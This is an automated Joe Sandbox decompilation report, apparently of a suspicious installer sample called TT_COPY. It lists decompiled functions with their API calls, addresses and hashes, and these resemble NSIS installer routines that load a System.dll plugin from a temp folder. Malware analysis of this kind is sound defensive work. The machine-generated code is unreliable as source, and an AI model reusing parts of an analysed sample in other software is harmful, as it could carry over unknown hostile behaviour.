                                                                                                                            					 *((intOrPtr*)(_t64 - 0x10)) = _t57;
                                                                                                                            					_t56 =  *(_t64 - 0x1c) >> 2;
                                                                                                                            					if(__eflags == 0) {
                                                                                                                            						_t36 = SendMessageW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8));
                                                                                                                            						L10:
                                                                                                                            						 *(_t64 - 0x38) = _t36;
                                                                                                                            					} else {
                                                                                                                            						_t42 = SendMessageTimeoutW(_t63, _t41,  *(_t64 - 0x18),  *(_t64 + 8), _t46, _t56, _t64 - 0x38);
                                                                                                                            						asm("sbb eax, eax");
                                                                                                                            						 *((intOrPtr*)(_t64 - 4)) =  ~_t42 + 1;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				__eflags =  *((intOrPtr*)(_t64 - 0x30)) - _t46;
                                                                                                                            				if( *((intOrPtr*)(_t64 - 0x30)) >= _t46) {
                                                                                                                            					_push( *(_t64 - 0x38));
                                                                                                                            					E00406484();
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t64 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}















                                                                                                                            0x00401c43
                                                                                                                            0x00401c45
                                                                                                                            0x00401c4c
                                                                                                                            0x00401c4f
                                                                                                                            0x00401c52
                                                                                                                            0x00401c5c
                                                                                                                            0x00401c60
                                                                                                                            0x00401c63
                                                                                                                            0x00401c6c
                                                                                                                            0x00401c6c
                                                                                                                            0x00401c6f
                                                                                                                            0x00401c73
                                                                                                                            0x00401c7c
                                                                                                                            0x00401c7c
                                                                                                                            0x00401c7f
                                                                                                                            0x00401c83
                                                                                                                            0x00401c85
                                                                                                                            0x00401cda
                                                                                                                            0x00401cdc
                                                                                                                            0x00401ce7
                                                                                                                            0x00401cf1
                                                                                                                            0x00401cf4
                                                                                                                            0x00401cf4
                                                                                                                            0x00401cfd
                                                                                                                            0x00000000
                                                                                                                            0x00401c87
                                                                                                                            0x00401c8e
                                                                                                                            0x00401c90
                                                                                                                            0x00401c93
                                                                                                                            0x00401c99
                                                                                                                            0x00401ca0
                                                                                                                            0x00401ca3
                                                                                                                            0x00401ccb
                                                                                                                            0x00401d03
                                                                                                                            0x00401d03
                                                                                                                            0x00401ca5
                                                                                                                            0x00401cb3
                                                                                                                            0x00401cbb
                                                                                                                            0x00401cbe
                                                                                                                            0x00401cbe
                                                                                                                            0x00401ca3
                                                                                                                            0x00401d06
                                                                                                                            0x00401d09
                                                                                                                            0x00401d0f
                                                                                                                            0x00402ba4
                                                                                                                            0x00402ba4
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • SendMessageTimeoutW.USER32(00000000,00000000,?,?,?,00000002,?), ref: 00401CB3
                                                                                                                            • SendMessageW.USER32(00000000,00000000,?,?), ref: 00401CCB
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: MessageSend$Timeout
                                                                                                                            • String ID: !
                                                                                                                            • API String ID: 1777923405-2657877971
                                                                                                                            • Opcode ID: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                            • Instruction ID: 549e056fbb7746b1afa8e7352ee9f1cbf83a3633853e14f9ff1f16dc1dd81c22
                                                                                                                            • Opcode Fuzzy Hash: 56378305e9cef062e59ac21505f1e4874eb63478d5e018d68d94a8de4df44513
                                                                                                                            • Instruction Fuzzy Hash: 46219C7190420AAFEF05AFA4D94AAAE7BB4FF84304F14453EF601B61D0D7B88941CB98
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 77%
                                                                                                                            			E00404D46(int _a4, intOrPtr _a8, signed int _a12, signed int _a16) {
                                                                                                                            				char _v68;
                                                                                                                            				char _v132;
                                                                                                                            				void* __ebx;
                                                                                                                            				void* __edi;
                                                                                                                            				void* __esi;
                                                                                                                            				signed int _t23;
                                                                                                                            				signed int _t24;
                                                                                                                            				void* _t31;
                                                                                                                            				void* _t33;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t44;
                                                                                                                            				signed int _t46;
                                                                                                                            				signed int _t50;
                                                                                                                            				signed int _t52;
                                                                                                                            				signed int _t53;
                                                                                                                            				signed int _t55;
                                                                                                                            
                                                                                                                            				_t23 = _a16;
                                                                                                                            				_t53 = _a12;
                                                                                                                            				_t44 = 0xffffffdc;
                                                                                                                            				if(_t23 == 0) {
                                                                                                                            					_push(0x14);
                                                                                                                            					_pop(0);
                                                                                                                            					_t24 = _t53;
                                                                                                                            					if(_t53 < 0x100000) {
                                                                                                                            						_push(0xa);
                                                                                                                            						_pop(0);
                                                                                                                            						_t44 = 0xffffffdd;
                                                                                                                            					}
                                                                                                                            					if(_t53 < 0x400) {
                                                                                                                            						_t44 = 0xffffffde;
                                                                                                                            					}
                                                                                                                            					if(_t53 < 0xffff3333) {
                                                                                                                            						_t52 = 0x14;
                                                                                                                            						asm("cdq");
                                                                                                                            						_t24 = 1 / _t52 + _t53;
                                                                                                                            					}
                                                                                                                            					_t25 = _t24 & 0x00ffffff;
                                                                                                                            					_t55 = _t24 >> 0;
                                                                                                                            					_t46 = 0xa;
                                                                                                                            					_t50 = ((_t24 & 0x00ffffff) + _t25 * 4 + (_t24 & 0x00ffffff) + _t25 * 4 >> 0) % _t46;
                                                                                                                            				} else {
                                                                                                                            					_t55 = (_t23 << 0x00000020 | _t53) >> 0x14;
                                                                                                                            					_t50 = 0;
                                                                                                                            				}
                                                                                                                            				_t31 = E0040657A(_t44, _t50, _t55,  &_v68, 0xffffffdf);
                                                                                                                            				_t33 = E0040657A(_t44, _t50, _t55,  &_v132, _t44);
                                                                                                                            				_t34 = E0040657A(_t44, _t50, 0x42d268, 0x42d268, _a8);
                                                                                                                            				wsprintfW(_t34 + lstrlenW(0x42d268) * 2, L"%u.%u%s%s", _t55, _t50, _t33, _t31);
                                                                                                                            				return SetDlgItemTextW( *0x433ed8, _a4, 0x42d268);
                                                                                                                            			}



















                                                                                                                            0x00404d4f
                                                                                                                            0x00404d54
                                                                                                                            0x00404d5c
                                                                                                                            0x00404d5d
                                                                                                                            0x00404d6a
                                                                                                                            0x00404d72
                                                                                                                            0x00404d73
                                                                                                                            0x00404d75
                                                                                                                            0x00404d77
                                                                                                                            0x00404d79
                                                                                                                            0x00404d7c
                                                                                                                            0x00404d7c
                                                                                                                            0x00404d83
                                                                                                                            0x00404d89
                                                                                                                            0x00404d89
                                                                                                                            0x00404d90
                                                                                                                            0x00404d97
                                                                                                                            0x00404d9a
                                                                                                                            0x00404d9d
                                                                                                                            0x00404d9d
                                                                                                                            0x00404da1
                                                                                                                            0x00404db1
                                                                                                                            0x00404db3
                                                                                                                            0x00404db6
                                                                                                                            0x00404d5f
                                                                                                                            0x00404d5f
                                                                                                                            0x00404d66
                                                                                                                            0x00404d66
                                                                                                                            0x00404dbe
                                                                                                                            0x00404dc9
                                                                                                                            0x00404ddf
                                                                                                                            0x00404df0
                                                                                                                            0x00404e0c

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(0042D268,0042D268,?,%u.%u%s%s,00000005,00000000,00000000,?,000000DC,00000000,?,000000DF,00000000,00000400,?), ref: 00404DE7
                                                                                                                            • wsprintfW.USER32 ref: 00404DF0
                                                                                                                            • SetDlgItemTextW.USER32(?,0042D268), ref: 00404E03
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: ItemTextlstrlenwsprintf
                                                                                                                            • String ID: %u.%u%s%s
                                                                                                                            • API String ID: 3540041739-3551169577
                                                                                                                            • Opcode ID: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                                                                                                                            • Instruction ID: d7f2b51e3f2153b105aad6c1cbcae815e44f670c765de83d30fbb221df5484fa
                                                                                                                            • Opcode Fuzzy Hash: 06d0c97e576fd12928d3ccf504f16285b7ed678bb4ff82b9d12c133dfbf75c1e
                                                                                                                            • Instruction Fuzzy Hash: AC11D573A041283BDB10656DAC45E9E369CAF81334F254237FA66F21D1EA78D91182E8
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 58%
                                                                                                                            			E00405E0C(WCHAR* _a4) {
                                                                                                                            				WCHAR* _t9;
                                                                                                                            
                                                                                                                            				_t9 = _a4;
                                                                                                                            				_push( &(_t9[lstrlenW(_t9)]));
                                                                                                                            				_push(_t9);
                                                                                                                            				if( *(CharPrevW()) != 0x5c) {
                                                                                                                            					lstrcatW(_t9, 0x40a014);
                                                                                                                            				}
                                                                                                                            				return _t9;
                                                                                                                            			}




                                                                                                                            0x00405e0d
                                                                                                                            0x00405e1a
                                                                                                                            0x00405e1b
                                                                                                                            0x00405e26
                                                                                                                            0x00405e2e
                                                                                                                            0x00405e2e
                                                                                                                            0x00405e36

                                                                                                                            APIs
                                                                                                                            • lstrlenW.KERNEL32(?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E12
                                                                                                                            • CharPrevW.USER32(?,00000000,?,C:\Users\user\AppData\Local\Temp\,0040351A,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,C:\Users\user\AppData\Local\Temp\,00403810), ref: 00405E1C
                                                                                                                            • lstrcatW.KERNEL32(?,0040A014), ref: 00405E2E
                                                                                                                            Strings
                                                                                                                            • C:\Users\user\AppData\Local\Temp\, xrefs: 00405E0C
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069866925.0000000000424000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069912074.0000000000431000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069940321.0000000000436000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069964680.0000000000442000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069994200.000000000045A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1070016354.000000000045D000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_400000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: CharPrevlstrcatlstrlen
                                                                                                                            • String ID: C:\Users\user\AppData\Local\Temp\
                                                                                                                            • API String ID: 2659869361-3355392842
                                                                                                                            • Opcode ID: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                            • Instruction ID: 1a595bf39a0a3392b99637bd72bd9cca8666c17676e511d5d4bf90e80f698eee
                                                                                                                            • Opcode Fuzzy Hash: 7317fb0b60a0da6156192e69c80d181f5022b3d5f83b8f009beaa75eacd33bdb
                                                                                                                            • Instruction Fuzzy Hash: A8D0A731101930BAC2127B49EC08DDF62ACAE89340341443BF145B30A4CB7C5E5187FD
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 91%
                                                                                                                            			E70B510E1(signed int _a8, intOrPtr* _a12, void* _a16, void* _a20) {
                                                                                                                            				void* _v0;
                                                                                                                            				void* _t27;
                                                                                                                            				signed int _t29;
                                                                                                                            				void* _t30;
                                                                                                                            				void* _t34;
                                                                                                                            				void* _t36;
                                                                                                                            				void* _t38;
                                                                                                                            				void* _t40;
                                                                                                                            				void* _t48;
                                                                                                                            				void* _t54;
                                                                                                                            				void* _t63;
                                                                                                                            				void* _t64;
                                                                                                                            				signed int _t66;
                                                                                                                            				void* _t67;
                                                                                                                            				void* _t73;
                                                                                                                            				void* _t74;
                                                                                                                            				void* _t77;
                                                                                                                            				void* _t80;
                                                                                                                            				void _t81;
                                                                                                                            				void _t82;
                                                                                                                            				intOrPtr _t84;
                                                                                                                            				void* _t86;
                                                                                                                            				void* _t88;
                                                                                                                            
                                                                                                                            				 *0x70b5506c = _a8;
                                                                                                                            				 *0x70b55070 = _a16;
                                                                                                                            				 *0x70b55074 = _a12;
                                                                                                                            				_a12( *0x70b55048, E70B51651, _t73);
                                                                                                                            				_t66 =  *0x70b5506c +  *0x70b5506c * 4 << 3;
                                                                                                                            				_t27 = E70B512E3();
                                                                                                                            				_v0 = _t27;
                                                                                                                            				_t74 = _t27;
                                                                                                                            				if( *_t27 == 0) {
                                                                                                                            					L28:
                                                                                                                            					return GlobalFree(_t27);
                                                                                                                            				}
                                                                                                                            				do {
                                                                                                                            					_t29 =  *_t74 & 0x0000ffff;
                                                                                                                            					_t67 = 2;
                                                                                                                            					_t74 = _t74 + _t67;
                                                                                                                            					_t88 = _t29 - 0x66;
                                                                                                                            					if(_t88 > 0) {
                                                                                                                            						_t30 = _t29 - 0x6c;
                                                                                                                            						if(_t30 == 0) {
                                                                                                                            							L23:
                                                                                                                            							_t31 =  *0x70b55040;
                                                                                                                            							if( *0x70b55040 == 0) {
                                                                                                                            								goto L26;
                                                                                                                            							}
                                                                                                                            							E70B51603( *0x70b55074, _t31 + 4, _t66);
                                                                                                                            							_t34 =  *0x70b55040;
                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                            							 *0x70b55040 =  *_t34;
                                                                                                                            							L25:
                                                                                                                            							GlobalFree(_t34);
                                                                                                                            							goto L26;
                                                                                                                            						}
                                                                                                                            						_t36 = _t30 - 4;
                                                                                                                            						if(_t36 == 0) {
                                                                                                                            							L13:
                                                                                                                            							_t38 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                            							_t74 = _t74 + _t67;
                                                                                                                            							_t34 = E70B51312(E70B5135A(_t38));
                                                                                                                            							L14:
                                                                                                                            							goto L25;
                                                                                                                            						}
                                                                                                                            						_t40 = _t36 - _t67;
                                                                                                                            						if(_t40 == 0) {
                                                                                                                            							L11:
                                                                                                                            							_t80 = ( *_t74 & 0x0000ffff) - 0x30;
                                                                                                                            							_t74 = _t74 + _t67;
                                                                                                                            							_t34 = E70B51381(_t80, E70B512E3());
                                                                                                                            							goto L14;
                                                                                                                            						}
                                                                                                                            						L8:
                                                                                                                            						if(_t40 == 1) {
                                                                                                                            							_t81 = GlobalAlloc(0x40, _t66 + 4);
                                                                                                                            							_t10 = _t81 + 4; // 0x4
                                                                                                                            							E70B51603(_t10,  *0x70b55074, _t66);
                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                            							 *_t81 =  *0x70b55040;
                                                                                                                            							 *0x70b55040 = _t81;
                                                                                                                            						}
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					if(_t88 == 0) {
                                                                                                                            						_t48 =  *0x70b55070;
                                                                                                                            						_t77 =  *_t48;
                                                                                                                            						 *_t48 =  *_t77;
                                                                                                                            						_t49 = _v0;
                                                                                                                            						_t84 =  *((intOrPtr*)(_v0 + 0xc));
                                                                                                                            						if( *((short*)(_t77 + 4)) == 0x2691) {
                                                                                                                            							E70B51603(_t49, _t77 + 8, 0x38);
                                                                                                                            							_t86 = _t86 + 0xc;
                                                                                                                            						}
                                                                                                                            						 *((intOrPtr*)( *_a12 + 0xc)) = _t84;
                                                                                                                            						GlobalFree(_t77);
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					_t54 = _t29 - 0x46;
                                                                                                                            					if(_t54 == 0) {
                                                                                                                            						_t82 = GlobalAlloc(0x40,  *0x70b5506c +  *0x70b5506c + 8);
                                                                                                                            						 *((intOrPtr*)(_t82 + 4)) = 0x2691;
                                                                                                                            						_t14 = _t82 + 8; // 0x8
                                                                                                                            						E70B51603(_t14, _v0, 0x38);
                                                                                                                            						_t86 = _t86 + 0xc;
                                                                                                                            						 *_t82 =  *( *0x70b55070);
                                                                                                                            						 *( *0x70b55070) = _t82;
                                                                                                                            						goto L26;
                                                                                                                            					}
                                                                                                                            					_t63 = _t54 - 6;
                                                                                                                            					if(_t63 == 0) {
                                                                                                                            						goto L23;
                                                                                                                            					}
                                                                                                                            					_t64 = _t63 - 4;
                                                                                                                            					if(_t64 == 0) {
                                                                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            					_t40 = _t64 - _t67;
                                                                                                                            					if(_t40 == 0) {
                                                                                                                            						 *_t74 =  *_t74 + 0xa;
                                                                                                                            						goto L11;
                                                                                                                            					}
                                                                                                                            					goto L8;
                                                                                                                            					L26:
                                                                                                                            				} while ( *_t74 != 0);
                                                                                                                            				_t27 = _v0;
                                                                                                                            				goto L28;
                                                                                                                            			}


























                                                                                                                            0x70b510eb
                                                                                                                            0x70b51100
                                                                                                                            0x70b51109
                                                                                                                            0x70b5110e
                                                                                                                            0x70b51119
                                                                                                                            0x70b5111c
                                                                                                                            0x70b51125
                                                                                                                            0x70b51129
                                                                                                                            0x70b5112b
                                                                                                                            0x70b512b0
                                                                                                                            0x70b512ba
                                                                                                                            0x70b512ba
                                                                                                                            0x70b51132
                                                                                                                            0x70b51132
                                                                                                                            0x70b51137
                                                                                                                            0x70b51138
                                                                                                                            0x70b5113a
                                                                                                                            0x70b5113d
                                                                                                                            0x70b51256
                                                                                                                            0x70b51259
                                                                                                                            0x70b51271
                                                                                                                            0x70b51271
                                                                                                                            0x70b51278
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b51285
                                                                                                                            0x70b5128a
                                                                                                                            0x70b5128f
                                                                                                                            0x70b51294
                                                                                                                            0x70b5129a
                                                                                                                            0x70b5129b
                                                                                                                            0x00000000
                                                                                                                            0x70b5129b
                                                                                                                            0x70b5125b
                                                                                                                            0x70b5125e
                                                                                                                            0x70b511bc
                                                                                                                            0x70b511bf
                                                                                                                            0x70b511c2
                                                                                                                            0x70b511cb
                                                                                                                            0x70b511d0
                                                                                                                            0x00000000
                                                                                                                            0x70b511d1
                                                                                                                            0x70b51264
                                                                                                                            0x70b51266
                                                                                                                            0x70b511a2
                                                                                                                            0x70b511a5
                                                                                                                            0x70b511a8
                                                                                                                            0x70b511b1
                                                                                                                            0x00000000
                                                                                                                            0x70b511b1
                                                                                                                            0x70b51164
                                                                                                                            0x70b51165
                                                                                                                            0x70b51177
                                                                                                                            0x70b51180
                                                                                                                            0x70b51184
                                                                                                                            0x70b5118e
                                                                                                                            0x70b51191
                                                                                                                            0x70b51193
                                                                                                                            0x70b51193
                                                                                                                            0x00000000
                                                                                                                            0x70b51165
                                                                                                                            0x70b51143
                                                                                                                            0x70b51218
                                                                                                                            0x70b5121d
                                                                                                                            0x70b51221
                                                                                                                            0x70b51223
                                                                                                                            0x70b5122c
                                                                                                                            0x70b5122f
                                                                                                                            0x70b51238
                                                                                                                            0x70b5123d
                                                                                                                            0x70b5123d
                                                                                                                            0x70b51247
                                                                                                                            0x70b5124a
                                                                                                                            0x00000000
                                                                                                                            0x70b51250
                                                                                                                            0x70b51149
                                                                                                                            0x70b5114c
                                                                                                                            0x70b511e9
                                                                                                                            0x70b511ed
                                                                                                                            0x70b511f7
                                                                                                                            0x70b511fb
                                                                                                                            0x70b51205
                                                                                                                            0x70b5120a
                                                                                                                            0x70b51211
                                                                                                                            0x00000000
                                                                                                                            0x70b51211
                                                                                                                            0x70b51152
                                                                                                                            0x70b51155
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x70b5115b
                                                                                                                            0x70b5115e
                                                                                                                            0x70b511b8
                                                                                                                            0x00000000
                                                                                                                            0x70b511b8
                                                                                                                            0x70b51160
                                                                                                                            0x70b51162
                                                                                                                            0x70b5119e
                                                                                                                            0x00000000
                                                                                                                            0x70b5119e
                                                                                                                            0x00000000
                                                                                                                            0x70b512a1
                                                                                                                            0x70b512a1
                                                                                                                            0x70b512ab
                                                                                                                            0x00000000

                                                                                                                            APIs
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 70B51171
                                                                                                                            • GlobalAlloc.KERNEL32(00000040,?), ref: 70B511E3
                                                                                                                            • GlobalFree.KERNEL32 ref: 70B5124A
                                                                                                                            • GlobalFree.KERNEL32(?), ref: 70B5129B
                                                                                                                            • GlobalFree.KERNEL32(00000000), ref: 70B512B1
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1093774692.0000000070B51000.00000020.00000001.01000000.00000004.sdmp, Offset: 70B50000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1093699351.0000000070B50000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093840225.0000000070B54000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1093914971.0000000070B56000.00000002.00000001.01000000.00000004.sdmpDownload File
                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                            • Snapshot File: hcaresult_0_2_70b50000_TT_COPY.jbxd
                                                                                                                            Similarity
                                                                                                                            • API ID: Global$Free$Alloc
                                                                                                                            • String ID:
                                                                                                                            • API String ID: 1780285237-0
                                                                                                                            • Opcode ID: 8df6ba20db2016c3ab90fd8a42b02af4773fe39f1d6606a5154d94e53759eb41
                                                                                                                            • Instruction ID: 5b3c4143a2801de308cd6a04042b20dfed71caa70c8081fd90fcb348eaf801e8
                                                                                                                            • Opcode Fuzzy Hash: 8df6ba20db2016c3ab90fd8a42b02af4773fe39f1d6606a5154d94e53759eb41
                                                                                                                            • Instruction Fuzzy Hash: 43518FB6500201DFD711DF69C894A1A77F8FB88315F2849D9FA06DB3A0EB71AB08CB50
                                                                                                                            Uniqueness

                                                                                                                            Uniqueness Score: -1.00%

                                                                                                                            C-Code - Quality: 92%
                                                                                                                            			E0040263E(void* __ebx, void* __edx, intOrPtr* __edi) {
                                                                                                                            				signed int _t14;
                                                                                                                            				int _t17;
                                                                                                                            				void* _t24;
                                                                                                                            				intOrPtr* _t29;
                                                                                                                            				void* _t31;
                                                                                                                            				signed int _t32;
                                                                                                                            				void* _t35;
                                                                                                                            				void* _t40;
                                                                                                                            				signed int _t42;
                                                                                                                            
                                                                                                                            				_t29 = __edi;
                                                                                                                            				_t24 = __ebx;
                                                                                                                            				_t14 =  *(_t35 - 0x28);
                                                                                                                            				_t40 = __edx - 0x38;
                                                                                                                            				 *(_t35 - 0x10) = _t14;
                                                                                                                            				_t27 = 0 | _t40 == 0x00000000;
                                                                                                                            				_t32 = _t40 == 0;
                                                                                                                            				if(_t14 == __ebx) {
                                                                                                                            					if(__edx != 0x38) {
                                                                                                                            						_t17 = lstrlenW(E00402DA6(0x11)) + _t16;
                                                                                                                            					} else {
                                                                                                                            						E00402DA6(0x21);
                                                                                                                            						E0040655F("C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp", "C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp\System.dll", 0x400);
                                                                                                                            						_t17 = lstrlenA("C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp\System.dll");
                                                                                                                            					}
                                                                                                                            				} else {
                                                                                                                            					E00402D84(1);
                                                                                                                            					 *0x40adf0 = __ax;
                                                                                                                            					 *((intOrPtr*)(__ebp - 0x44)) = __edx;
                                                                                                                            				}
                                                                                                                            				 *(_t35 + 8) = _t17;
                                                                                                                            				if( *_t29 == _t24) {
                                                                                                                            					L13:
                                                                                                                            					 *((intOrPtr*)(_t35 - 4)) = 1;
                                                                                                                            				} else {
                                                                                                                            					_t31 = E0040649D(_t27, _t29);
                                                                                                                            					if((_t32 |  *(_t35 - 0x10)) != 0 ||  *((intOrPtr*)(_t35 - 0x24)) == _t24 || E0040610E(_t31, _t31) >= 0) {
                                                                                                                            						_t14 = E004060DF(_t31, "C:\Users\Arthur\AppData\Local\Temp\nshF836.tmp\System.dll",  *(_t35 + 8));
                                                                                                                            						_t42 = _t14;
                                                                                                                            						if(_t42 == 0) {
                                                                                                                            							goto L13;
                                                                                                                            						}
                                                                                                                            					} else {
                                                                                                                            						goto L13;
                                                                                                                            					}
                                                                                                                            				}
                                                                                                                            				 *0x434f88 =  *0x434f88 +  *((intOrPtr*)(_t35 - 4));
                                                                                                                            				return 0;
                                                                                                                            			}












                                                                                                                            0x0040263e
                                                                                                                            0x0040263e
                                                                                                                            0x0040263e
                                                                                                                            0x00402643
                                                                                                                            0x00402646
                                                                                                                            0x00402649
                                                                                                                            0x0040264e
                                                                                                                            0x00402650
                                                                                                                            0x00402670
                                                                                                                            0x004026aa
                                                                                                                            0x00402672
                                                                                                                            0x00402674
                                                                                                                            0x00402688
                                                                                                                            0x00402695
                                                                                                                            0x00402695
                                                                                                                            0x00402652
                                                                                                                            0x00402654
                                                                                                                            0x00402659
                                                                                                                            0x00402667
                                                                                                                            0x0040266a
                                                                                                                            0x004026af
                                                                                                                            0x004026b2
                                                                                                                            0x0040292e
                                                                                                                            0x0040292e
                                                                                                                            0x004026b8
                                                                                                                            0x004026c1
                                                                                                                            0x004026c3
                                                                                                                            0x004026e2
                                                                                                                            0x004015b4
                                                                                                                            0x004015b6
                                                                                                                            0x00000000
                                                                                                                            0x004015bc
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x00000000
                                                                                                                            0x004026c3
                                                                                                                            0x00402c2d
                                                                                                                            0x00402c39

                                                                                                                            APIs
                                                                                                                            • lstrlenA.KERNEL32(C:\Users\user\AppData\Local\Temp\nshF836.tmp\System.dll), ref: 00402695
                                                                                                                            Strings
                                                                                                                            Memory Dump Source
                                                                                                                            • Source File: 00000000.00000002.1069590569.0000000000401000.00000020.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
                                                                                                                            • Associated: 00000000.00000002.1069539735.0000000000400000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069665567.0000000000408000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069705541.000000000040A000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                            • Associated: 00000000.00000002.1069757377.0000000000410000.00000004.00000001.01000000.00000003.sdmpDownload File
